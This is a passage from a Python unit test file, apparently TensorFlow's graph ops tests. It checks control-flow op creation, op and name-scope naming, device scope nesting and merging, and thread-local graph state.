        self.assertLen(new_ops, 1)
        return x
      control_flow_ops.cond(x < 10, true_fn, lambda: x)
    op = g.get_operation_by_name("cond/myop")
    self.assertIsNotNone(op)
    self.assertEqual(op.name, "cond/myop")
    self.assertEqual(op.type, "IntInput")
    self.assertEqual(op.outputs, [])
    op_input = op.inputs[0].op
    self.assertEqual(op_input.type, "Switch")
    self.assertEqual(op_input.inputs[0], x)
    self.assertEqual(op.graph, g)
    # pylint: disable=protected-access
    self.assertIsNotNone(op._get_control_flow_context())
    self.assertEqual(op._get_control_flow_context().name,
                     "cond/cond_text")
    # pylint: enable=protected-access
  @test_util.run_v1_only("b/120545219")
  def testWhileLoop(self):
    g = ops.Graph()
    with g.as_default():
      x = test_ops.int_output()
      def body(i):
        ops._create_c_op(ops.get_default_graph(),
                         ops._NodeDef("IntInput", "myloop/myop"), [x], [])
        new_ops = g._add_new_tf_operations()
        self.assertLen(new_ops, 1)
        return i
      control_flow_ops.while_loop(lambda i: i < 10, body, [0], name="myloop")
    op = g.get_operation_by_name("myloop/myop")
    self.assertIsNotNone(op)
    self.assertEqual(op.name, "myloop/myop")
    self.assertEqual(op.type, "IntInput")
    self.assertEqual(op.outputs, [])
    op_input = op.inputs[0].op
    self.assertEqual(op_input.type, "Enter")
    self.assertEqual(list(op_input.inputs), [x])
    self.assertEqual(op.graph, g)
    # pylint: disable=protected-access
    self.assertIsNotNone(op._get_control_flow_context())
    self.assertEqual(op._get_control_flow_context().name,
                     "myloop/while_context")
    # pylint: enable=protected-access
  @test_util.run_v1_only("b/120545219")
  def testWhileLoopWithInternalControlDep(self):
    g = ops.Graph()
    with g.as_default():
      x = test_ops.int_output()
      def body(i):
        c = constant_op.constant(1.0, name="c")
        ops._create_c_op(ops.get_default_graph(),
                         ops._NodeDef("IntInput", "myloop/myop"), [x], [])
        with ops.control_dependencies([c]):
          new_ops = g._add_new_tf_operations()
          self.assertLen(new_ops, 1)
        return i
      control_flow_ops.while_loop(lambda i: i < 10, body, [0], name="myloop")
    op = g.get_operation_by_name("myloop/myop")
    self.assertIsNotNone(op)
    c = g.get_operation_by_name("myloop/c")
    self.assertIsNotNone(c)
    # Internal control dep is preserved
    self.assertEqual(op.control_inputs, [c])
  @test_util.run_v1_only("b/120545219")
  def testWhileLoopWithExternalControlDep(self):
    g = ops.Graph()
    with g.as_default():
      x = test_ops.int_output()
      c = constant_op.constant(1.0)
      def body(i):
        ops._create_c_op(ops.get_default_graph(),
                         ops._NodeDef("IntInput", "myloop/myop"), [x], [])
        with ops.control_dependencies([c]):
          new_ops = g._add_new_tf_operations()
          self.assertLen(new_ops, 1)
        return i
      control_flow_ops.while_loop(lambda i: i < 10, body, [0], name="myloop")
    op = g.get_operation_by_name("myloop/myop")
    self.assertIsNotNone(op)
    # External control dep is removed and replaced with internal control dep
    self.assertNotEqual(op.control_inputs[0], c.op)
    self.assertIsNotNone(op.control_inputs[0]._get_control_flow_context())
class ApplyOpTest(test_util.TensorFlowTestCase):
  """Tests for the module-level `_apply_op` helper: return-value shape
  (single tensor vs list) and node_def wiring."""

  def testNodeDefArgs(self):
    g = ops.Graph()
    t1 = _apply_op(g, "FloatOutput", [], [dtypes.float32], name="myop1")
    with g.device("/device:GPU:0"):
      t2 = _apply_op(
          g, "TwoIntOutputs", [], [dtypes.int32, dtypes.int32], name="myop2")
    t3 = _apply_op(
        g,
        "Foo1", [t1, t2[1], t2[0]], [dtypes.float32, dtypes.int32],
        name="myop3")
    self.assertTrue(isinstance(t1, ops.Tensor))
    self.assertTrue(isinstance(t2, list))
    self.assertTrue(isinstance(t3, list))
    self.assertTrue(isinstance(t3[0], ops.Tensor))
    self.assertEqual("myop1", t1._as_node_def_input())
    self.assertEqual("myop2", t2[0]._as_node_def_input())
    self.assertEqual("myop2:1", t2[1]._as_node_def_input())
    self.assertEqual("myop3", t3[0]._as_node_def_input())
    # Validate that we got the right ops as well
    self.assertProtoEquals("name:'myop1' op:'FloatOutput'", t1.op.node_def)
    self.assertProtoEquals(
        "name:'myop2' op:'TwoIntOutputs' device:'/device:GPU:0'",
        t2[0].op.node_def)
    self.assertProtoEquals(
        "name:'myop3' input:'myop1' input:'myop2:1' input:'myop2' op:'Foo1'",
        t3[0].op.node_def)
  def testReferenceInput(self):
    g = ops.Graph()
    ref_t, nonref_t = _apply_op(
        g, "RefOutputFloatOutput", [], [dtypes.float32_ref, dtypes.float32],
        name="op1")
    self.assertProtoEquals("op:'RefOutputFloatOutput' name:'op1'",
                           ref_t.op.node_def)
    # NOTE(mrry): Must specify input_types to preserve ref-typed input.
    out_2 = _apply_op(
        g,
        "RefInputFloatInputIntOutput", [ref_t, nonref_t], [dtypes.int32],
        input_types=[dtypes.float32_ref, dtypes.float32],
        name="op2")
    self.assertProtoEquals(
        "op:'RefInputFloatInputIntOutput' name:'op2' input:'op1' input:'op1:1'",
        out_2.op.node_def)
    out_3 = _apply_op(
        g, "TwoFloatInputsIntOutput", [ref_t, nonref_t], [dtypes.int32],
        name="op3")
    self.assertProtoEquals(
        "op:'TwoFloatInputsIntOutput' name:'op3' input:'op1' input:'op1:1'",
        out_3.op.node_def)
class NameStackTest(test_util.TensorFlowTestCase):
  """Tests for Graph.unique_name and Graph.name_scope: uniquification,
  nesting, scope re-entry, case handling, and invalid scope names."""

  def testBasics(self):
    g = ops.Graph()
    self.assertEqual("foo", g.unique_name("foo", mark_as_used=False))
    self.assertEqual("foo", g.unique_name("foo", mark_as_used=False))
    self.assertEqual("foo", g.unique_name("foo"))
    self.assertEqual("foo_1", g.unique_name("foo", mark_as_used=False))
    self.assertEqual("foo_1", g.unique_name("foo"))
    self.assertEqual("foo_2", g.unique_name("foo", mark_as_used=False))
    self.assertEqual("foo_2", g.unique_name("foo"))
    self.assertEqual("foo_1_1", g.unique_name("foo_1", mark_as_used=False))
    self.assertEqual("foo_1_1", g.unique_name("foo_1"))
    self.assertEqual("foo_1_2", g.unique_name("foo_1", mark_as_used=False))
    self.assertEqual("foo_1_2", g.unique_name("foo_1"))
    self.assertEqual("foo_1_2_1", g.unique_name("foo_1_2", mark_as_used=False))
    self.assertEqual("foo_1_2_1", g.unique_name("foo_1_2"))
    with g.name_scope("bar"):
      self.assertEqual("bar/foo", g.unique_name("foo", mark_as_used=False))
      self.assertEqual("bar/foo", g.unique_name("foo"))
      self.assertEqual("bar/foo_1", g.unique_name("foo", mark_as_used=False))
      self.assertEqual("bar/foo_1", g.unique_name("foo"))
      with g.name_scope(None):
        self.assertEqual("foo_3", g.unique_name("foo", mark_as_used=False))
        self.assertEqual("foo_3", g.unique_name("foo"))
      with g.name_scope("baz"):
        self.assertEqual(
            "bar/baz/foo", g.unique_name(
                "foo", mark_as_used=False))
        self.assertEqual("bar/baz/foo", g.unique_name("foo"))
        self.assertEqual(
            "bar/baz/foo_1", g.unique_name(
                "foo", mark_as_used=False))
        self.assertEqual("bar/baz/foo_1", g.unique_name("foo"))
      with g.name_scope("baz"):
        self.assertEqual(
            "bar/baz_1/foo", g.unique_name(
                "foo", mark_as_used=False))
        self.assertEqual("bar/baz_1/foo", g.unique_name("foo"))
        self.assertEqual(
            "bar/baz_1/foo_1", g.unique_name(
                "foo", mark_as_used=False))
        self.assertEqual("bar/baz_1/foo_1", g.unique_name("foo"))
    with g.name_scope("quux"):
      self.assertEqual("quux/foo", g.unique_name("foo", mark_as_used=False))
      self.assertEqual("quux/foo", g.unique_name("foo"))
    with g.name_scope("bar"):
      with g.name_scope("baz"):
        self.assertEqual(
            "bar_1/baz/foo", g.unique_name(
                "foo", mark_as_used=False))
        self.assertEqual("bar_1/baz/foo", g.unique_name("foo"))
    self.assertEqual("foo_4", g.unique_name("foo", mark_as_used=False))
    self.assertEqual("foo_4", g.unique_name("foo"))
    self.assertEqual("bar_2", g.unique_name("bar", mark_as_used=False))
    self.assertEqual("bar_2", g.unique_name("bar"))
  def testBackslashAndDashRegex(self):
    # GitHub issue 39019, all should pass
    g = ops.Graph()
    with g.name_scope("n_CatCntc-campaign\\c_campaign"):
      pass
    with g.name_scope("foo"):
      with g.name_scope("n_CatCntc-campaign\\c_campaign"):
        pass
    with g.name_scope("n_CatCntc-campaign\\c_campaign"):
      with g.name_scope("foo"):
        pass
  @test_util.run_deprecated_v1
  def testNameAndVariableScope(self):
    with self.cached_session() as sess:
      with sess.graph.name_scope("l0"):
        with variable_scope.variable_scope("l1"):
          with sess.graph.name_scope("l1") as scope:
            self.assertEqual("l0/l1/l1/", scope)
            self.assertEqual(
                "l0/l1/l1/foo",
                sess.graph.unique_name(
                    "foo", mark_as_used=False))
            self.assertEqual("l0/l1/l1/foo", sess.graph.unique_name("foo"))
          with sess.graph.name_scope("l2") as scope:
            self.assertEqual("l0/l1/l2/", scope)
            self.assertEqual(
                "l0/l1/l2/foo",
                sess.graph.unique_name(
                    "foo", mark_as_used=False))
            self.assertEqual("l0/l1/l2/foo", sess.graph.unique_name("foo"))
  def testOutOfOrderUniqueName(self):
    # Requesting "foo_2" first does not block later "foo" requests from
    # eventually skipping over it.
    g = ops.Graph()
    self.assertEqual("foo_2", g.unique_name("foo_2"))
    self.assertEqual("foo", g.unique_name("foo"))
    self.assertEqual("foo_1", g.unique_name("foo"))
    self.assertEqual("foo_3", g.unique_name("foo"))
  def testUniqueNameCaseInsensitivity(self):
    # Uniquification compares names case-insensitively but preserves case.
    g = ops.Graph()
    self.assertEqual("foo", g.unique_name("foo"))
    self.assertEqual("Foo_1", g.unique_name("Foo"))
    with g.name_scope("bar"):
      self.assertEqual("bar/foo", g.unique_name("foo"))
    with g.name_scope("Bar"):
      self.assertEqual("Bar_1/foo", g.unique_name("foo"))
  def testInvalidNameRaisesError(self):
    g = ops.Graph()
    with g.name_scope(""):  # Should not raise
      pass
    with g.name_scope("foo/"):  # Should not raise
      with g.name_scope("_bar"):  # Should not raise
        pass
    with self.assertRaises(ValueError):
      with g.name_scope("foo:0"):
        pass
    with self.assertRaises(ValueError):
      with g.name_scope("_bar"):
        pass
  def testEmptyScopeEdgeCases(self):
    # "" and None both reset to the root scope, even when nested.
    g = ops.Graph()
    self.assertEqual("", g.get_name_scope())
    with g.name_scope("") as scope:
      self.assertEqual("", scope)
      self.assertEqual("", g.get_name_scope())
    with g.name_scope(None) as scope:
      self.assertEqual("", scope)
      self.assertEqual("", g.get_name_scope())
    with g.name_scope("foo") as scope:
      self.assertEqual("foo/", scope)
      self.assertEqual("foo", g.get_name_scope())
      with g.name_scope("") as scope:
        self.assertEqual("", scope)
        self.assertEqual("", g.get_name_scope())
      with g.name_scope(None) as scope:
        self.assertEqual("", scope)
        self.assertEqual("", g.get_name_scope())
class NameTest(test_util.TensorFlowTestCase):
  """Tests for automatic op naming and `Graph.name_scope` composition."""

  def testGenerateName(self):
    """Ops default to their op-type name, with "_N" suffixes on reuse."""
    g = ops.Graph()
    # First op of a type uses the bare op-type name.
    op0 = g.create_op("TwoFloatOutputs", [], [dtypes.float32, dtypes.float32])
    self.assertEqual("TwoFloatOutputs", op0.name)
    # Output tensor names are "<op name>:<output index>".
    self.assertEqual("TwoFloatOutputs:0", op0.outputs[0].name)
    self.assertEqual("TwoFloatOutputs:1", op0.outputs[1].name)
    op1 = g.create_op("FloatOutput", [], [dtypes.float32])
    self.assertEqual("FloatOutput", op1.name)
    self.assertEqual("FloatOutput:0", op1.outputs[0].name)
    # A second op of the same type is uniquified with a "_1" suffix.
    op2 = g.create_op("FloatOutput", [], [dtypes.float32])
    self.assertEqual("FloatOutput_1", op2.name)
    self.assertEqual("FloatOutput_1:0", op2.outputs[0].name)
    # An explicit name= overrides the generated one.
    op3 = g.create_op("FloatOutput", [], [dtypes.float32], name="my_op")
    self.assertEqual("my_op", op3.name)
    self.assertEqual("my_op:0", op3.outputs[0].name)

  def testNameScope(self):
    """name_scope nests, resets on ""/None, and uniquifies reused scopes."""
    g = ops.Graph()
    with g.name_scope("foo") as foo:
      self.assertEqual("foo/", foo)
      with g.name_scope("foo2") as foo2:
        self.assertEqual("foo/foo2/", foo2)
      # None and "" both reset to the root scope.
      with g.name_scope(None) as empty1:
        self.assertEqual("", empty1)
        with g.name_scope("foo3") as foo3:
          self.assertEqual("foo3/", foo3)
      with g.name_scope("") as empty2:
        self.assertEqual("", empty2)
    self.assertEqual("FloatOutput",
                     g.create_op("FloatOutput", [], [dtypes.float32]).name)
    with g.name_scope("bar") as scope:
      self.assertEqual("bar/FloatOutput",
                       g.create_op("FloatOutput", [], [dtypes.float32]).name)
      self.assertEqual("bar/FloatOutput_1",
                       g.create_op("FloatOutput", [], [dtypes.float32]).name)
      # If you use the value from "with .. as", that values is used as-is.
      self.assertEqual(
          "bar", g.create_op(
              "FloatOutput", [], [dtypes.float32], name=scope).name)
    with g.name_scope("baz") as scope:
      with g.name_scope("quux"):
        self.assertEqual("baz/quux/FloatOutput",
                         g.create_op("FloatOutput", [], [dtypes.float32]).name)
      # If you use the value from the enclosing "with .. as", nothing is pushed.
      with g.name_scope(scope):
        self.assertEqual("baz/FloatOutput",
                         g.create_op("FloatOutput", [], [dtypes.float32]).name)
        self.assertEqual(
            "baz", g.create_op(
                "FloatOutput", [], [dtypes.float32], name=scope).name)
        # A trailing "/" means "use this name literally, without scoping".
        self.assertEqual(
            "trailing",
            g.create_op(
                "FloatOutput", [], [dtypes.float32], name="trailing/").name)
    # Re-entering "bar" without a trailing slash opens a fresh "bar_1" scope...
    with g.name_scope("bar"):
      self.assertEqual("bar_1/FloatOutput",
                       g.create_op("FloatOutput", [], [dtypes.float32]).name)
    # ...while "bar/" re-enters the original "bar" scope.
    with g.name_scope("bar/"):
      self.assertEqual("bar/FloatOutput_2",
                       g.create_op("FloatOutput", [], [dtypes.float32]).name)
class DeviceTest(test_util.TensorFlowTestCase):
  """Tests for `Graph.device` scoping: nesting, merging, overriding,
  clearing with None, and out-of-order exit errors."""

  def testNoDevice(self):
    """An op created outside any device scope has no device set."""
    g = ops.Graph()
    op = g.create_op("FloatOutput", [], [dtypes.float32])
    self.assertDeviceEqual(None, op.device)
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput" }
    """, gd)

  def testEagerBackingDevice(self):
    """In eager mode a device scope sets both device and backing_device."""
    with context.eager_mode():
      with ops.device("/device:CPU:0"):
        t = constant_op.constant(1.0)
        self.assertRegex(t.device, "/device:CPU:0")
        self.assertRegex(t.backing_device, "/device:CPU:0")

  def testDevicePartialString(self):
    """A partial device string is recorded as-is on the op."""
    g = ops.Graph()
    with g.device("/job:worker/replica:2"):
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2" }
    """, gd)

  def testDeviceFull(self):
    """A fully-specified DeviceSpec renders as the full device path."""
    g = ops.Graph()
    with g.device(
        pydev.DeviceSpec(
            job="worker", replica=2, task=0, device_type="CPU",
            device_index=3)):
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2/task:0/device:CPU:3" }
    """, gd)

  def testNesting(self):
    """An inner device scope applies while active; the outer one resumes."""
    g = ops.Graph()
    with g.device("/job:worker/replica:2"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/job:worker/replica:3/task:0"):
        g.create_op("FloatOutput", [], [dtypes.float32])
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/replica:3/task:0" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2" }
    """, gd)

  def testNestingString(self):
    """Same nesting behavior when device scopes are given as strings."""
    g = ops.Graph()
    with g.device("/job:worker/replica:2"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/job:worker/replica:3/task:0"):
        g.create_op("FloatOutput", [], [dtypes.float32])
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/replica:3/task:0" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2" }
    """, gd)

  def testNestingOverrideGpuCpu(self):
    """An inner scope can override the device type of the outer scope."""
    g = ops.Graph()
    with g.device("/job:worker/replica:2/device:CPU:1"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/job:worker/replica:2/device:GPU:2"):
        g.create_op("FloatOutput", [], [dtypes.float32])
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2/device:CPU:1"  }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/replica:2/device:GPU:2" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2/device:CPU:1" }
    """, gd)

  def testNestingWithMergeDeviceFunction(self):
    """merge_device fills in unset fields; merge_device(None) is a no-op."""
    g = ops.Graph()
    with g.device(pydev.merge_device("/device:GPU:0")):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device(pydev.merge_device("/job:worker")):
        g.create_op("FloatOutput", [], [dtypes.float32])
        with g.device(pydev.merge_device("/device:CPU:0")):
          g.create_op("FloatOutput", [], [dtypes.float32])
          with g.device(pydev.merge_device("/job:ps")):
            g.create_op("FloatOutput", [], [dtypes.float32])
            with g.device(pydev.merge_device(None)):
              g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/device:GPU:0" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/device:GPU:0" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/device:CPU:0" }
      node { name: "FloatOutput_3" op: "FloatOutput"
             device: "/job:ps/device:CPU:0" }
      node { name: "FloatOutput_4" op: "FloatOutput"
             device: "/job:ps/device:CPU:0" }
    """, gd)

  def testNestingWithDeviceStrings(self):
    """Plain strings merge like merge_device; "" leaves devices unchanged."""
    g = ops.Graph()
    with g.device("/device:GPU:0"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/job:worker"):
        g.create_op("FloatOutput", [], [dtypes.float32])
        with g.device("/device:CPU:0"):
          g.create_op("FloatOutput", [], [dtypes.float32])
          with g.device("/job:ps"):
            g.create_op("FloatOutput", [], [dtypes.float32])
            with g.device(""):
              g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/device:GPU:0" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/device:GPU:0" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/device:CPU:0" }
      node { name: "FloatOutput_3" op: "FloatOutput"
             device: "/job:ps/device:CPU:0" }
      node { name: "FloatOutput_4" op: "FloatOutput"
             device: "/job:ps/device:CPU:0" }
    """, gd)

  def testNestingWithDeviceStringWildcard(self):
    """Wildcard indices ("*") merge with concrete outer device indices."""
    g = ops.Graph()
    with g.device("/device:GPU:7"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/device:GPU:*"):
        g.create_op("FloatOutput", [], [dtypes.float32])
    with g.device("/device:CPU:*"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/device:CPU:5"):
        g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/device:GPU:7" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/device:GPU:7" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/device:CPU:*" }
      node { name: "FloatOutput_3" op: "FloatOutput"
             device: "/device:CPU:5" }
    """, gd)

  def testNestingErrorGraph(self):
    """Exiting graph device scopes out of order raises RuntimeError."""
    g = ops.Graph()
    scope = g.device("/device:GPU:8")
    scope.__enter__()
    with g.device("/device:GPU:9"):
      with self.assertRaises(RuntimeError):
        scope.__exit__(None, None, None)

  def testNestingErrorEager(self):
    """Same out-of-order exit error for eager-mode device scopes."""
    with context.eager_mode():
      scope = ops.device("/device:CPU:0")
      scope.__enter__()
      with ops.device(None):
        with self.assertRaises(RuntimeError):
          scope.__exit__(None, None, None)

  def testNoneClearsDefault(self):
    """device(None) clears the enclosing device for ops created inside."""
    g = ops.Graph()
    with g.device("/job:worker/replica:2/device:CPU:1"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device(None):
        g.create_op("FloatOutput", [], [dtypes.float32])
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2/device:CPU:1" }
      node { name: "FloatOutput_1" op: "FloatOutput" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2/device:CPU:1" }
    """, gd)

  def testNoneIgnoresOuterDeviceFunction(self):
    """device(None) also disables an enclosing device *function*."""
    g = ops.Graph()
    with g.device(lambda op: "/job:worker/replica:2/device:CPU:1"):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device(None):
        g.create_op("FloatOutput", [], [dtypes.float32])
      g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:worker/replica:2/device:CPU:1" }
      node { name: "FloatOutput_1" op: "FloatOutput" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2/device:CPU:1" }
    """, gd)

  def _overwritingDeviceFunction(self, unused_op):
    """Device function that forces every op onto "/job:overwrite"."""
    # This device function unconditionally overwrites the device of ops.
    #
    # NOTE(mrry): Writing device functions like this is not
    # recommended. Instead, in most cases you should use
    # `pydev.merge_device("/job:ps")` or simply `"/job:ps"` as the
    # argument to `tf.device()` and the device component will be merged in.
    return "/job:overwrite"

  def testOverwritingBehavior(self):
    """An overwriting device function beats inner scopes unless it is
    disabled with an intervening device(None)."""
    g = ops.Graph()
    with g.device(self._overwritingDeviceFunction):
      g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device("/job:ps"):  # Will be overwritten.
        g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device(pydev.merge_device("/job:ps")):  # Will be overwritten.
        g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device(None):  # Disables overwriting device function
        with g.device("/job:ps"):
          g.create_op("FloatOutput", [], [dtypes.float32])
      with g.device(None):  # Disables overwriting device function
        with g.device(pydev.merge_device("/job:ps")):
          g.create_op("FloatOutput", [], [dtypes.float32])
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput" op: "FloatOutput"
             device: "/job:overwrite" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:overwrite" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:overwrite" }
      node { name: "FloatOutput_3" op: "FloatOutput"
             device: "/job:ps" }
      node { name: "FloatOutput_4" op: "FloatOutput"
             device: "/job:ps" }
    """, gd)
class MultithreadedGraphStateTest(test_util.TensorFlowTestCase):
  """Tests that per-thread graph state (device, colocation, control-dep and
  name stacks) stays isolated across threads after switch_to_thread_local().

  Each test spawns three worker threads that mutate some piece of graph
  state, rendezvous with the main thread via events, and then create an op
  that should be affected only by their own thread's state."""

  class TestThread(threading.Thread):
    """Worker that mutates graph state, pauses, then creates an op."""

    def __init__(self, graph, replica_id):
      super(MultithreadedGraphStateTest.TestThread, self).__init__()
      self._graph = graph       # graph whose thread-local state is exercised
      self._replica_id = replica_id  # distinguishes this thread's ops
      # This thread sets this event when it mutated the graph. The caller can
      # wait for that.
      self.has_mutated_graph = threading.Event()
      # This thread waits for when it should continue. The caller can set this
      # event.
      self.should_continue = threading.Event()

    def run(self):
      # Mutate a graph's stack, then set `has_mutated_graph`, then wait for
      # `should_continue`, then add an op to the graph affected by the graph's
      # stack.
      raise NotImplementedError("must be implemented in descendants")

  def testDeviceFunctionStack(self):
    """Each thread's device scope applies only to that thread's ops."""
    class DeviceSettingThread(self.TestThread):
      def run(self):
        with g.device("/job:worker/replica:{}".format(self._replica_id)):
          self.has_mutated_graph.set()
          self.should_continue.wait()
          self.should_continue.clear()
          g.create_op(
              "FloatOutput", [], [dtypes.float32],
              name="FloatOutput_{}".format(self._replica_id))
    g = ops.Graph()
    # If `switch_to_thread` isn't called, then device placement of the ops
    # below is not deterministic.
    g.switch_to_thread_local()
    threads = [DeviceSettingThread(g, i) for i in range(3)]
    for t in threads:
      t.start()
      t.has_mutated_graph.wait()
      t.has_mutated_graph.clear()
    for t in threads:
      t.should_continue.set()
      t.join()
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "FloatOutput_0" op: "FloatOutput"
             device: "/job:worker/replica:0" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/replica:1" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2" }
    """, gd)

  def testColocateWith(self):
    """Each thread's colocate_with scope applies only to its own op."""
    class ColocatingThread(self.TestThread):
      def __init__(self, graph, replica_id, op_to_colocate_with):
        super(ColocatingThread, self).__init__(graph, replica_id)
        self._op_to_colocate_with = op_to_colocate_with
      def run(self):
        with g.colocate_with(self._op_to_colocate_with):
          self.has_mutated_graph.set()
          self.should_continue.wait()
          self.should_continue.clear()
          g.create_op(
              "FloatOutput", [], [dtypes.float32],
              name="FloatOutput_{}".format(self._replica_id))
    g = ops.Graph()
    ops_to_colocate_with = []
    for i in range(3):
      with g.device("/job:worker/replica:{}".format(i)):
        ops_to_colocate_with.append(
            g.create_op(
                "FloatOutput", [], [dtypes.float32],
                name="ColocateWithMe_{}".format(i)))
    # If `switch_to_thread` isn't called, then `device` and `attr` values for
    # the ops below are not deterministic.
    g.switch_to_thread_local()
    threads = [
        ColocatingThread(g, i, ops_to_colocate_with[i]) for i in range(3)
    ]
    for t in threads:
      t.start()
      t.has_mutated_graph.wait()
      t.has_mutated_graph.clear()
    for t in threads:
      t.should_continue.set()
      t.join()
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "ColocateWithMe_0" op: "FloatOutput"
             device: "/job:worker/replica:0" }
      node { name: "ColocateWithMe_1" op: "FloatOutput"
             device: "/job:worker/replica:1" }
      node { name: "ColocateWithMe_2" op: "FloatOutput"
             device: "/job:worker/replica:2" }
      node { name: "FloatOutput_0" op: "FloatOutput"
             device: "/job:worker/replica:0"
             attr { key: "_class"
             value { list {
             s: "loc:@ColocateWithMe_0"}}}}
      node { name: "FloatOutput_1" op: "FloatOutput"
             device: "/job:worker/replica:1"
             attr { key: "_class"
             value { list {
             s: "loc:@ColocateWithMe_1"}}}}
      node { name: "FloatOutput_2" op: "FloatOutput"
             device: "/job:worker/replica:2"
             attr { key: "_class"
             value { list {
             s: "loc:@ColocateWithMe_2"}}}}
    """, gd)

  def testControlDependencies(self):
    """Each thread's control_dependencies scope applies only to its op."""
    class DependingThread(self.TestThread):
      def __init__(self, graph, replica_id, dependency_op):
        super(DependingThread, self).__init__(graph, replica_id)
        self._dependency_op = dependency_op
      def run(self):
        with g.control_dependencies([self._dependency_op]):
          self.has_mutated_graph.set()
          self.should_continue.wait()
          self.should_continue.clear()
          g.create_op(
              "FloatOutput", [], [dtypes.float32],
              name="FloatOutput_{}".format(self._replica_id))
    g = ops.Graph()
    dependency_ops = []
    for i in range(3):
      dependency_ops.append(
          g.create_op(
              "FloatOutput", [], [dtypes.float32],
              name="ColocateWithMe_{}".format(i)))
    # If `switch_to_thread` isn't called, then `input` values for the ops below
    # are not deterministic.
    g.switch_to_thread_local()
    threads = [DependingThread(g, i, dependency_ops[i]) for i in range(3)]
    for t in threads:
      t.start()
      t.has_mutated_graph.wait()
      t.has_mutated_graph.clear()
    for t in threads:
      t.should_continue.set()
      t.join()
    gd = g.as_graph_def()
    self.assertProtoEqualsVersion("""
      node { name: "ColocateWithMe_0" op: "FloatOutput" }
      node { name: "ColocateWithMe_1" op: "FloatOutput" }
      node { name: "ColocateWithMe_2" op: "FloatOutput" }
      node { name: "FloatOutput_0" op: "FloatOutput"
             input: "^ColocateWithMe_0" }
      node { name: "FloatOutput_1" op: "FloatOutput"
             input: "^ColocateWithMe_1" }
      node { name: "FloatOutput_2" op: "FloatOutput"
             input: "^ColocateWithMe_2" }
    """, gd)

  def testNameStack(self):
    """Each thread entering name_scope("foo") gets its own uniquified scope
    ("foo", "foo_1", "foo_2") that persists for later ops on that thread."""
    class NameSettingThread(self.TestThread):
      def run(self):
        with g.name_scope("foo"):
          op1 = g.create_op("FloatOutput", [], [dtypes.float32])
          self.has_mutated_graph.set()
          self.should_continue.wait()
          self.should_continue.clear()
          op2 = g.create_op("FloatOutput", [], [dtypes.float32])
          self.result = (op1, op2)
    g = ops.Graph()
    threads = [NameSettingThread(g, i) for i in range(3)]
    for t in threads:
      t.start()
      t.has_mutated_graph.wait()
      t.has_mutated_graph.clear()
    for t in threads:
      t.should_continue.set()
      t.join()
    suffixes = ["", "_1", "_2"]
    for t, s in zip(threads, suffixes):
